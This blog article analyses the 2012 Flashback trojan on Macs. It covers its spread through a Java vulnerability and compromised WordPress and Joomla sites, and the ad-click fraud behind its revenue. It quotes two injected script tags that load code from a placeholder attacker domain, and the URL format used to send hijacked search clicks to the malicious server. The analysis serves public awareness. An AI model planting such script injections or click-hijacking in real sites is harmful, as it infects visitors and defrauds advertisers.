Pierluigi Paganini
May 02, 2012
Many people who do not work in our sector are asking me two questions with increasing frequency:
Obvious my answers, we cannot think of a software system free of bugs and vulnerabilities. To those who I have proposed me the questions I recently brought as an example the Flashback Trojan and the related botnet known as Flashfake. Apple isn’t immune to malware, it’s code is rich of vulnerabilities like any other and during the various security context its products have been exploited.
Flashback was created in September 2011 to disguise itself as an Adobe Flash Player installer, using Flash player layout. Once it is installed search user names and passwords stored on the victims. The Trojan has been created to conduct click fraud scam by hijacking people’s search engine results inside their web browsers, stealing banking or login credential. Of course once infected the system it could be used as part of a botnet causing bigger damages. The botnet related to the Flashback has been designed by cyber criminals to conduct a click fraud scam, taking advantage of pay-per-click campaigns by advertising companies.
The cybercrime is demonstrating an increasing interest in those activities that could ensure high profits and low risks such as cyber scams, digital Identity thieves an similar frauds. Apple company and its products represent a great business opportunity in this optical, let’s consider also the between the Apple’s users is largely diffused the conviction that their products are immune to malware, a wrong consideration that expose them to serious risks.
The Flashback trojan, also known as OSX.Flashback.K was being distributed using the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507), which was patched by Oracle in February. The main problem related to MAC platforms was the large interval between the dates in which the patch was issued and it’s availability for Apple products, around 6 weeks during which Flashback Trojan infected Macs on a large scale.
The Flashback creators took advantage of the gap between Oracle and Apple’s patches by exploiting vulnerable websites using WordPress and Joomla to add malicious code snippets.
<script src=”[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1″></script>
<script src=”[ATTACKER_DOMAIN].rr.nu/nl.php?p=d”></script>
When a user visited an infected web site on an unpatched Mac, OSX.Flashback.K would be installed.
It a Flashback Trojan doesn’t represent a serious concern for Mac World, we must to consider the collateral effects that are not negligible and that have transformed the malware in a business opportunity for cyber criminals and security firms.
Let’s start from the security firms, that have had historically problems to penetrate the MAC world due the assumption made by Apple’s users. Well the media effect of the virus has fortunately overturned the user’s conviction suddenly pushing up the demand for antivirus software for Apple. The major companies operating in the field of computer security have responded promptly providing what has been requested by the market, in this case the news has worked as a driving force for an industry that struggled to take off.
That is the first economic effect of the cyber threat, the second one is related to the benefit that crime industry is still having. To explain it I introduce a study realized by Symantec experts which have analyzed Flashback malware. The security specialists have found an ad-clicking component used by the malware designers to generate revenue.
“Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker’s choosing, where they receive revenue from the click,” Symantec wrote in a blog post. “Google never receives the intended ad click.”
The proposed schema let the creators implement a revenue process really profitable already implemented in similar scam. Last August W32.Xpaj.B Trojan realized daily profits of $450 placing on 25,000 pc infected. Comparing the figures with the infection related to Flashback, proceeding with a deductive mechanism, the experts declared that with a botnet composed of 650,000 infected machines the creators of Flashback could rises a revenue of $10,000 per day.
According to Symantec what actually is worrying regarding the trojan is the ad-clicking component of Flashback was loaded into common browser like Chrome, Safari and Firefox. ad-clicking component
The ad-clicking component is able to intercept all GET and POST requests directly from the browser. The ad click component parses out requests resulting from an ad click on Google Search and determines if it is on a whitelist. If not, it forwards the request to the malicious server in the following form:
http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
In the following picture is shown the response RC4 decrypted and then base64 decoded:
This hijacked ad click is based on a user searching for “toys”. We can note the presence of the word “BIDOK” that has been recognized as a Flashback command. It’s is also clear the value of 0.8 cents for the click and the redirection URL.
It ‘easy to imagine how profitable can be a similar scam. The creators of malware are just enjoying the growth of their profits, click after click.
Pierluigi Paganini
